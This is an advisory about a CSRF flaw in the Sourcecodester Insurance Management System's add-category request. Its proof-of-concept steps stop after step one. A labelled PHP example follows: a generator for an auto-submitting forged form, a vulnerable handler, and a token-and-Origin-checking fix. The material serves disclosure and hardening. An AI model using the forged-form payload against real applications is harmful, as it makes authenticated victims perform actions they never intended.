### CSRF Vulnerability in the Sourcecodester Insurance Management System PHP and MySQL

#### Description

Cross-Site Request Forgery (CSRF) is a web security vulnerability in which an attacker tricks a user into performing actions on a web application where that user is authenticated. CSRF exploits the trust a web application places in the user's browser: the browser attaches the session cookie to every request for the application's origin, whether the request was initiated by the user or by a page the attacker controls. For example, if a user is logged in to their bank and visits a malicious website, that site can submit a request to transfer money from the user's account without their consent, riding on the existing authentication session.

In the Sourcecodester Insurance Management System, the request that adds an insurance category is accepted on the strength of the session cookie alone; it carries no anti-CSRF token. An attacker can therefore send the victim a link to an HTML page containing a pre-filled form (the CSRF proof of concept). If the victim is authenticated as an administrator, the form submits and insurance category data is added on the victim's behalf.

#### Impact

1. **Unauthorized Actions**: Attackers can perform actions on behalf of an authenticated user, such as changing account settings, making financial transactions, or any other action the user is authorized to perform.
2. **Data Corruption**: Forged requests can insert, alter, or corrupt application data.
3. **Loss of Trust**: If users' accounts are exploited, users lose trust in the application and its security.
4. **Legal and Financial Repercussions**: For applications handling financial and personal data, CSRF can have legal and financial consequences for both users and the service provider.

#### Proof of Concept (POC)

1. Log in to the application with the admin account, once in a normal window and once in a private window.
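The following is an added example, not code from the Sourcecodester application or from the original advisory. It shows the three pieces a practitioner wants side by side: the attacker-side auto-submitting form that exercises the flaw, the shape of a handler that accepts such a request because it checks only the session, and a hardened handler that requires a per-session synchronizer token (plus an Origin check as defence in depth). The endpoint path `/admin/categories/add.php`, the field names `name` and `description`, and the `categories` table are assumptions, since the advisory does not name them; adapt them to the real add-category handler.

```php
<?php
// Added example (not the project's code). Endpoint path, field names and
// table name are assumptions; the advisory does not state them.

// --- 1. Attacker side: CSRF proof-of-concept page ---------------------------
// Served from an attacker-controlled origin. When the victim's browser loads
// it, the form posts to the target and the browser attaches the victim's
// session cookie, so the application treats it as an admin action.
function csrf_poc_html(string $target_url, array $fields): string {
    $inputs = '';
    foreach ($fields as $name => $value) {
        $inputs .= sprintf(
            '<input type="hidden" name="%s" value="%s">',
            htmlspecialchars($name, ENT_QUOTES),
            htmlspecialchars($value, ENT_QUOTES)
        );
    }
    return '<html><body>'
         . '<form id="f" method="POST" action="' . htmlspecialchars($target_url, ENT_QUOTES) . '">'
         . $inputs
         . '</form>'
         . "<script>document.getElementById('f').submit();</script>"
         . '</body></html>';
}

// --- 2. Vulnerable handler (the shape of the flaw) ---------------------------
// Only the login session is checked (by whatever include guards the page), so
// any cross-site POST that carries the cookie is executed.
function add_category_vulnerable(PDO $db, array $post): bool {
    $stmt = $db->prepare('INSERT INTO categories (name, description) VALUES (?, ?)');
    return $stmt->execute([$post['name'] ?? '', $post['description'] ?? '']);
}

// --- 3. Hardened handler: synchronizer token + Origin check -------------------
// Requires session_start() to have been called by the including page.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random token
    }
    return $_SESSION['csrf_token'];
}

// The legitimate form embeds the token; an attacker's page cannot read it
// because the same-origin policy stops it from reading the victim's page.
function render_category_form(): string {
    return '<form method="POST" action="/admin/categories/add.php">'
         . '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES) . '">'
         . '<input name="name"><input name="description">'
         . '<button type="submit">Add</button></form>';
}

function add_category_hardened(PDO $db, array $post, array $server): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405);
        return false;
    }
    // Token must be present and match the session copy; hash_equals avoids
    // leaking the token through timing differences.
    if (!isset($post['csrf_token'], $_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token'])) {
        http_response_code(403);
        return false;
    }
    // Defence in depth: when the browser sends an Origin header, it must be
    // our own host. Browsers send Origin on cross-site POSTs.
    if (isset($server['HTTP_ORIGIN'])) {
        $origin_host = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        if ($origin_host !== ($server['SERVER_NAME'] ?? null)) {
            http_response_code(403);
            return false;
        }
    }
    $stmt = $db->prepare('INSERT INTO categories (name, description) VALUES (?, ?)');
    return $stmt->execute([$post['name'] ?? '', $post['description'] ?? '']);
}

// Usage, attacker side (assumed target URL and field names):
// echo csrf_poc_html('http://target.example/admin/categories/add.php',
//                    ['name' => 'Injected category', 'description' => 'added via CSRF']);
//
// Usage, server side:
// session_start();
// add_category_hardened($pdo, $_POST, $_SERVER);
```

Two practical notes. First, the PoC only works if the browser attaches the session cookie to a cross-site POST; setting the session cookie with `SameSite=Lax` (the modern browser default when the attribute is absent) or `SameSite=Strict` blocks this top-level form post as well, but it is a browser-side control and should complement the token, not replace it. Second, the hardened handler still relies on the existing login check; the token proves the request was issued from a page the application itself rendered to that session, which is exactly what the forged form cannot obtain.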